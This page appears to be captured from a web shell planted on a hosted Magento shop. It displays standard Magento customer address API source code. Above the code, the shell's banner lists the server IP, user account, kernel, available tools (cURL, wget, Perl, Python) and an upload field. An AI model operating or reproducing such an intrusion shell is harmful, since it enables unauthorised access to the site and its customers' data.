| Server IP : 213.186.33.4 / Your IP : 216.73.216.193 Web Server : Apache System : Linux webm006.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : awebpaca ( 35430) PHP Version : 8.5.0 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/awebpaca/boutiques/app/code/core/Mage/Customer/Model/Address/ |
Upload File : |
<?php
/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for your
* needs please refer to http://www.magentocommerce.com for more information.
*
* @category Mage
* @package Mage_Customer
* @copyright Copyright (c) 2010 Magento Inc. (http://www.magentocommerce.com)
* @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
*/
/**
* Customer address api
*
* @category Mage
* @package Mage_Customer
* @author Magento Core Team <core@magentocommerce.com>
*/
class Mage_Customer_Model_Address_Api extends Mage_Customer_Model_Api_Resource
{
protected $_mapAttributes = array(
'customer_address_id' => 'entity_id'
);
public function __construct()
{
$this->_ignoredAttributeCodes[] = 'parent_id';
}
/**
* Retrive customer addresses list
*
* @param int $customerId
* @return array
*/
public function items($customerId)
{
$customer = Mage::getModel('customer/customer')
->load($customerId);
/* @var $customer Mage_Customer_Model_Customer */
if (!$customer->getId()) {
$this->_fault('customer_not_exists');
}
$result = array();
foreach ($customer->getAddresses() as $address) {
$data = $address->toArray();
$row = array();
foreach ($this->_mapAttributes as $attributeAlias => $attributeCode) {
$row[$attributeAlias] = isset($data[$attributeCode]) ? $data[$attributeCode] : null;
}
foreach ($this->getAllowedAttributes($address) as $attributeCode => $attribute) {
if (isset($data[$attributeCode])) {
$row[$attributeCode] = $data[$attributeCode];
}
}
$row['is_default_billing'] = $customer->getDefaultBilling() == $address->getId();
$row['is_default_shipping'] = $customer->getDefaultShipping() == $address->getId();
$result[] = $row;
}
return $result;
}
/**
* Create new address for customer
*
* @param int $customerId
* @param array $addressData
* @return int
*/
public function create($customerId, $addressData)
{
$customer = Mage::getModel('customer/customer')
->load($customerId);
/* @var $customer Mage_Customer_Model_Customer */
if (!$customer->getId()) {
$this->_fault('customer_not_exists');
}
$address = Mage::getModel('customer/address');
foreach ($this->getAllowedAttributes($address) as $attributeCode=>$attribute) {
if (isset($addressData[$attributeCode])) {
$address->setData($attributeCode, $addressData[$attributeCode]);
}
}
if (isset($addressData['is_default_billing'])) {
$address->setIsDefaultBilling($addressData['is_default_billing']);
}
if (isset($addressData['is_default_shipping'])) {
$address->setIsDefaultShipping($addressData['is_default_shipping']);
}
$address->setCustomerId($customer->getId());
$valid = $address->validate();
if (is_array($valid)) {
$this->_fault('data_invalid', implode("\n", $valid));
}
try {
$address->save();
} catch (Mage_Core_Exception $e) {
$this->_fault('data_invalid', $e->getMessage());
}
return $address->getId();
}
/**
* Retrieve address data
*
* @param int $addressId
* @return array
*/
public function info($addressId)
{
$address = Mage::getModel('customer/address')
->load($addressId);
if (!$address->getId()) {
$this->_fault('not_exists');
}
$result = array();
foreach ($this->_mapAttributes as $attributeAlias => $attributeCode) {
$result[$attributeAlias] = $address->getData($attributeCode);
}
foreach ($this->getAllowedAttributes($address) as $attributeCode => $attribute) {
$result[$attributeCode] = $address->getData($attributeCode);
}
if ($customer = $address->getCustomer()) {
$result['is_default_billing'] = $customer->getDefaultBilling() == $address->getId();
$result['is_default_shipping'] = $customer->getDefaultShipping() == $address->getId();
}
return $result;
}
/**
* Update address data
*
* @param int $addressId
* @param array $addressData
* @return boolean
*/
public function update($addressId, $addressData)
{
$address = Mage::getModel('customer/address')
->load($addressId);
if (!$address->getId()) {
$this->_fault('not_exists');
}
foreach ($this->getAllowedAttributes($address) as $attributeCode=>$attribute) {
if (isset($addressData[$attributeCode])) {
$address->setData($attributeCode, $addressData[$attributeCode]);
}
}
if (isset($addressData['is_default_billing'])) {
$address->setIsDefaultBilling($addressData['is_default_billing']);
}
if (isset($addressData['is_default_shipping'])) {
$address->setIsDefaultShipping($addressData['is_default_shipping']);
}
$valid = $address->validate();
if (is_array($valid)) {
$this->_fault('data_invalid', implode("\n", $valid));
}
try {
$address->save();
} catch (Mage_Core_Exception $e) {
$this->_fault('data_invalid', $e->getMessage());
}
return true;
}
/**
* Delete address
*
* @param int $addressId
* @return boolean
*/
public function delete($addressId)
{
$address = Mage::getModel('customer/address')
->load($addressId);
if (!$address->getId()) {
$this->_fault('not_exists');
}
try {
$address->delete();
} catch (Mage_Core_Exception $e) {
$this->_fault('not_deleted', $e->getMessage());
}
return true;
}
} // Class Mage_Customer_Model_Address_Api End